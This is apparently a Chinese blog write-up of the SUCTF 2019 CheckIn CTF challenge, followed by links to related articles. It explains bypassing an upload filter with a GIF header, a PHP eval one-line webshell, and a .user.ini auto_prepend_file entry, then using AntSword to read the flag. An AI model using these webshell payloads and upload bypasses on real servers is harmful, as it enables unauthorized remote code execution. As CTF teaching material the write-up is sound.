BUUCTF__[SUCTF 2019]CheckIn_题解

2024-04-14 07:18
文章标签 buuctf 2019 题解 suctf checkin

本文主要是介绍BUUCTF__[SUCTF 2019]CheckIn_题解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、前言

  • 最近有点烦,感觉自己什么都不会。估计是在家待的太久了,浪费了很多时间。
  • 这学期不开学了,真烦,被网课折磨,这都快期末了。

二、看题

  • 一个文件上传的题目,而且给了源码,但可能没有也能做。
  • 不过我看wp都看的很懵。
    在这里插入图片描述
  • 先尝试上传一张正常的图片,回显了文件目录
    在这里插入图片描述
  • 再尝试上传php一句话木马。提示非法后缀
  • <?php @eval($_POST['post']) ?>
    在这里插入图片描述
  • 再尝试改一下文件后缀,提示有 <? 应该是黑名单过滤。
    在这里插入图片描述
  • 所以尝试用 <script language="php">eval($_POST['a']);</script> ,提示这不是图片
    在这里插入图片描述
  • 注意前面的 exif_imagetype 这是图片用来判断文件类型的函数,在给出的源码也能发现。
  • 然后呢?然后呢?然后呢?

三、研究

一句话木马变形

  • 说一下一句话木马,天真的我以为只有<?php @eval($_POST['post']) ?>
  • 然而还是太天真了,一句话木马有很多姿势,是值得深入研究的内容,毕竟危害太大了,可以为所欲为。
  • 一句话木马常见的可以是用php、jsp、asp、aspx写的,看蚁剑连接方式就能发现。而且内容远远不是这么简单。可以自行了解。
  • 所以我们需要让一句话木马里没有 <? 所以用了 <script language="php">eval($_POST['a']);</script> ,但本质上还是 PHP 一句话木马,因为执行函数还是 PHP 的 eval()

绕过文件检测

  • 首先了解到用的是 exif_imagetype() 函数检测文件类型。
  • 简单的说,这个函数是通过检测你上传的文件名的文件头来确定文件类型。文件头通常在文件开头几个字节,相当于一个标识符。具体可以自行了解。
  • 所以我们只要在文件开头加上图片的文件头,就会会认为是图片文件。
  • 但仍然无法直接上传 PHP 文件。因为文件后缀正则匹配了ph、而且对大小写不敏感。
 if (preg_match("/ph|htacess/i", $extension)) {die("illegal suffix!");}
  • 所以我们如果上传图片马得有办法让它被当作 PHP 文件执行。所以重点来了。

执行图片马

  • 目前已知可以上传修改文件名和条件文件头的php文件,但无法被解析。
  • 虽然在apache中,可以用 .htacess文件来实现,可也被正则了。
.user.ini
  • 简单的说,我们应该知道 PHP 中的配置文件 php.ini ,很多操作都需要修改它,比如说可以隐藏报错、修改上传文件限制等。
  • 而我们要用的 .user.ini也是 PHP 的一个配置文件,但没有 php.ini 等级高。就像admin用户和普通用户的差别,php.ini 有很多配置权限,但 .user.ini没有。详情了解,可以看看这个
  • 但仍然可以帮助我们执行图片马原因有以下的配置选项。
auto_prepend_file 或 auto_append_file
  auto_prepend_file 在页面顶部加载文件      auto_append_file  在页面底部加载文件
  • 什么意思呢,相当于在每个php页面加上一句 include() ,可以在PHP中加载执行另一个PHP文件。
  • 注意,是每个,也就是说只要有 PHP 文件被加载,就会去加载执行这个文件,而且是以 PHP 的方式解析。
  • 所以,我们上面绕过了了文件验证,上传了一个 .user.ini 文件,再上传一个图片马,让被执行的 PHP 文件去包含执行我们的图片马,就可以用蚁剑连接来得到flag。

四、解题

  • 首先我们先创建一个图片马。

  • 最简单的方式就是先上传一个后缀名为 GIF的 PHP 文件,再抓包加上文件头文本 GIF89a ,或者把文件用winhex或其它工具十六进制打开,在文件头加上相应的十六进制数。当然也可以用 png 或 jpg 形式的图片马,只不过添加文件头只能通过加十六进制数而已,还是抓包简单。
    在这里插入图片描述

  • 成功传入图片马,再上传 包含auto_prepend_file配置选项的.user.ini文件,让它去包含我们上传的图片马。
    在这里插入图片描述

  • 成功传入.user.ini 同时,知道了存在被执行的index.php 文件,同时知道了文件路径,所以用蚁剑来连接。

      http://69a5ba54-c3eb-4c89-95f2-648ef5626820.node3.buuoj.cn/uploads/48cd8b43081896fbd0931d204f947663/index.php     
    

在这里插入图片描述

  • 连接成功,寻找flag,直接终端用 linux 命令行 cat /flag 得到 flag
    在这里插入图片描述
  • 结束,有一点是会不定时清理上传的文件,连接失败了可以再尝试上传一次。

五、最后

  • 接触到了新的知识点 , .user.ini ,学到了文件上传新姿势。
  • 附上原题链接
  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。
  • 最后欢迎来访 个人博客

这篇关于BUUCTF__[SUCTF 2019]CheckIn_题解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/902406

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

BUUCTF(34)特殊的 BASE64

使用pycharm时,如果想把代码撤销到之前的状态可以用 Ctrl+z 如果不小心撤销多了,可以用 Ctrl+Shift+Z 还原, 别傻傻的重新敲了 BUUCTF在线评测 (buuoj.cn) 查看字符串,想到base64的变表 这里用的c++的标准程序库中的string,头文件是#include<string> 这是base64的加密函数 std::string

C++ | Leetcode C++题解之第393题UTF-8编码验证

题目: 题解: class Solution {public:static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num &

C语言 | Leetcode C语言题解之第393题UTF-8编码验证

题目: 题解: static const int MASK1 = 1 << 7;static const int MASK2 = (1 << 7) + (1 << 6);bool isValid(int num) {return (num & MASK2) == MASK1;}int getBytes(int num) {if ((num & MASK1) == 0) {return

C - Word Ladder题解

C - Word Ladder 题解 解题思路: 先输入两个字符串S 和t 然后在S和T中寻找有多少个字符不同的个数(也就是需要变换多少次) 开始替换时: tips: 字符串下标以0开始 我们定义两个变量a和b,用于记录当前遍历到的字符 首先是判断:如果这时a已经==b了,那么就跳过,不用管; 如果a大于b的话:那么我们就让s中的第i项替换成b,接着就直接输出S就行了。 这样

【秋招笔试】9.07米哈游秋招改编题-三语言题解

🍭 大家好这里是 春秋招笔试突围,一起备战大厂笔试 💻 ACM金牌团队🏅️ | 多次AK大厂笔试 | 大厂实习经历 ✨ 本系列打算持续跟新 春秋招笔试题 👏 感谢大家的订阅➕ 和 喜欢💗 和 手里的小花花🌸 ✨ 笔试合集传送们 -> 🧷春秋招笔试合集 🍒 本专栏已收集 100+ 套笔试题,笔试真题 会在第一时间跟新 🍄 题面描述等均已改编,如果和你笔试题看到的题面描述

LeetCode 第414场周赛个人题解

目录 Q1. 将日期转换为二进制表示 原题链接 思路分析 AC代码 Q2. 范围内整数的最大得分 原题链接 思路分析 AC代码 Q3. 到达数组末尾的最大得分 原题链接 思路分析 AC代码 Q4. 吃掉所有兵需要的最多移动次数 原题链接 思路分析 AC代码 Q1. 将日期转换为二进制表示 原题链接 Q1. 将日期转换为二进制表示 思路分析

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

牛客小白月赛100部分题解

比赛地址:牛客小白月赛100_ACM/NOI/CSP/CCPC/ICPC算法编程高难度练习赛_牛客竞赛OJ A.ACM中的A题 #include<bits/stdc++.h>using namespace std;#define ll long long#define ull = unsigned long longvoid solve() {ll a,b,c;cin>>a>>b>

P2858 [USACO06FEB] Treats for the Cows G/S 题解

P2858 题意 给一个数组。每天把最左或者最右的东西卖掉,第 i i i个东西,第 d a y day day天卖出的价格是 a [ i ] ∗ d a y a[i]*day a[i]∗day。 记忆化搜索 void dfs(int l,int r,int day,ll sum){if(v[l][r]>=sum)return;v[l][r]=sum;if(l>r)//这就是dp答案{